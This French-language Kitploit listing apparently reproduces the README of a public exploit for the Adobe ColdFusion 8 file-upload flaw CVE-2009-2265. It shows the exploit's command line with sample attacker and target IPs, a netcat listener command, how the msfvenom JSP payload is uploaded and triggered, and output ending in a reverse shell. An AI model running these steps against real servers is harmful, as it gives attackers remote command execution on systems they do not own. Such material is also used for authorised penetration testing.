Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Adobe-ColdFusion-8-RCE-CVE-2009-2265 — Adobe ColdFusion 8 - Exécution de commande à distance (RCE) | Kitploit
Outils/GitHubGitHub/0xdtc/adobe-coldfusion-8-rce-cve-2009-2265
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHub0xdtc/adobe-coldfusion-8-rce-cve-2009-2265

Adobe-ColdFusion-8-RCE-CVE-2009-2265

Adobe ColdFusion 8 - Exécution de commande à distance (RCE)

Voir le dépôt
13il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Adobe ColdFusion 8 - Exploitation d'exécution de commandes à distance (RCE)

Présentation

Cet exploit cible une vulnérabilité connue dans Adobe ColdFusion 8 (CVE-2009-2265). Il permet l'exécution de commandes à distance (RCE) en téléchargeant une charge utile JSP malveillante qui établit une connexion reverse shell.


Détails de l'exploit

  • CVE : CVE-2009-2265
  • Vulnérabilité : Mauvaise gestion du téléchargement de fichiers dans Adobe ColdFusion 8.
  • Versions concernées : Adobe ColdFusion 8.
  • Impact : Permet aux attaquants d'exécuter des commandes arbitraires sur le serveur.

Fonctionnalités
  1. Génère automatiquement une charge utile JSP à l'aide de msfvenom.
  2. Télécharge la charge utile à l'aide d'une requête POST multipart.
  3. Déclenche la charge utile pour établir un reverse shell.
  4. Nettoie automatiquement les fichiers de charge utile locaux après exécution.

Utilisation

Pour utiliser cet exploit, vous avez besoin des éléments suivants :

  • Une machine Kali Linux ou un environnement de test d'intrusion similaire.
  • Netcat installé pour écouter sur le port spécifié.
  • Un serveur Adobe ColdFusion 8 vulnérable.

Syntaxe de la commande

root@kitploit:~
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>

Arguments

  • -l <LHOST> : Adresse IP de l'attaquant local (ex : 10.10.16.5).
  • -p <LPORT> : Port local de l'attaquant pour le reverse shell (ex : 9001).
  • -r <RHOST> : Adresse IP de la cible distante (ex : 10.10.10.11).
  • -q <RPORT> : Port distant de la cible sur lequel ColdFusion s'exécute (ex : 8500).

Exemple d'utilisation

root@kitploit:~
./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
  1. Démarrez un écouteur sur votre machine attaquante :

    root@kitploit:~
    nc -lnvp 9001
    
  2. Exécutez l'exploit avec les arguments appropriés.

  3. Une fois exécuté, la charge utile se connectera à votre écouteur.


Fonctionnement

  1. Génération de la charge utile :

    • Le script utilise msfvenom pour générer une charge utile JSP malveillante.
    • La charge utile initie un reverse shell vers le LHOST et le LPORT spécifiés.
  2. Téléchargement de la charge utile :

    • La charge utile est téléchargée sur le serveur ColdFusion vulnérable via une requête POST.
  3. Déclenchement de la charge utile :

    • La charge utile téléchargée est exécutée en envoyant une requête GET à l'URL du fichier.
  4. Établissement du reverse shell :

    • Un reverse shell est établi, donnant à l'attaquant un accès au système cible.

Prérequis

  • msfvenom pour la génération de la charge utile.
  • curl pour le téléchargement de fichier et le déclenchement de la charge utile.
  • nc (Netcat) pour écouter les connexions reverse shell.

Exemple de sortie

root@kitploit:~
[+] Génération de la charge utile reverse shell JSP...
[+] Charge utile enregistrée sous 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Téléchargement de la charge utile vers la cible...
[+] Réponse du serveur :
    <script type="text/javascript">
        window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
    </script>
[+] Attente du démarrage de l'écouteur Netcat sur le port 9001...
[+] Écouteur Netcat détecté en cours d'exécution sur le port 9001 !
[+] Tentative de déclenchement de la charge utile...
[+] Charge utile déclenchée avec succès. Vérifiez votre écouteur pour le reverse shell.
[+] Nettoyage des fichiers locaux...
[+] Terminé !

Avertissement

Ce script est fourni à des fins éducatives uniquement. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test. Toute utilisation non autorisée de cet exploit sur des systèmes qui ne vous appartiennent pas est illégale et contraire à l'éthique.


Auteur

Développé par [0xDTC].

Télécharger l’outil